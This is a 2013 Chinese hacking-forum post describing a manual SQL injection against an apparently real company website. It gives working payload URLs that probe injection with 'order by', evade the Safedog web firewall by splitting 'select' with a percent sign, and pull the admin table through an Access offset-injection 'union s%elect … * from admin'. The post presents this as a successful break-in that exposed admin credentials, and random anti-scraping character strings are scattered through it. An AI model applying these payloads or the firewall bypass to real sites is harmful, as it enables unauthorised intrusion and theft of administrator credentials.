找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2069|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。- ~4 Z" w$ e* ~  `- Z) X, j; f
' a) x2 C4 Y4 l4 v" Z
& |: O3 k- L5 I, ~
顺手加个admin
3 _2 e7 R7 `2 m/ Y5 @. g6 P/ o4 w( W) q$ u
+ O6 _+ K/ {9 h8 i. v
默认后台。
) H$ \6 E* W' L! v2 O回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
" E+ ~" q1 I/ Y4 K  u# ?, @0 O% U) o7 G4 `/ E/ J
# `& I) p0 P5 b' L3 e
& h( k8 p! {4 R0 m# Y! ]) t+ M
所以就不用御剑扫了,待会直接封IP。
& R) t0 A5 o0 W3 |* [: C
3 w6 B/ N$ ~1 X4 ^7 G3 J用order by语句判断是否存在注入。
1 l7 d1 t) T2 i- A+ `* ^: ahttp://www.xxx.com /product_show.asp?id=997 order by 1) u7 g# c( y) U0 y& {
http://www.xxx.com /product_show.asp?id=997 order by 100
# N6 W' l& N' [+ T7 D现在存在注入,经测试后发现是9个字段。
$ {0 n0 e4 t+ ?0 J$ S* F8 o; \) d * {% Z# J) T" n* [
接下来进行联合查询,猜是否存在admin表。" ~6 z, n1 `; I+ }0 D
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​' a) a' f* l% a' F+ t
! G# B8 e# Y  \! u2 |0 |+ Z4 `0 p0 O8 S

+ V- j4 F6 Y$ Y. C. ]9 K3 d) L3 Q4 u  t: `0 j  b+ l; E; }
在select中间加个%,se%lect绕过安全狗。
& c3 \4 M4 q6 X) c7 t$ r3 D8 d# v; n& V3 e, u
7 f( o3 s8 G* s# p# Y' t& U
发现存在admin表,然后开始手工猜常用的字段。
5 v  H: F1 y% p. D( g8 c0 L" l9 c纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
7 R: N# \& L7 H4 h+ j # b& C, F6 z8 X) q9 P. x# Y
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。3 W6 _7 D  \+ Z+ _/ L" u  c& @

* t1 z& W4 o4 e9 n: B4 o( v) N, u科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。* e& C& h  C$ z) f6 z- O7 H" |* ]8 y
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 s+ Y' i8 i2 i. M# o; Z好了,敏感内容出显了。​' Y8 M4 c" C0 |5 [

- T9 u$ D3 U& \' }1 ~( O( T- `  m' B- T7 A- P. |$ M1 O: y+ \
' ?. I8 Y, U# ?; e- ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表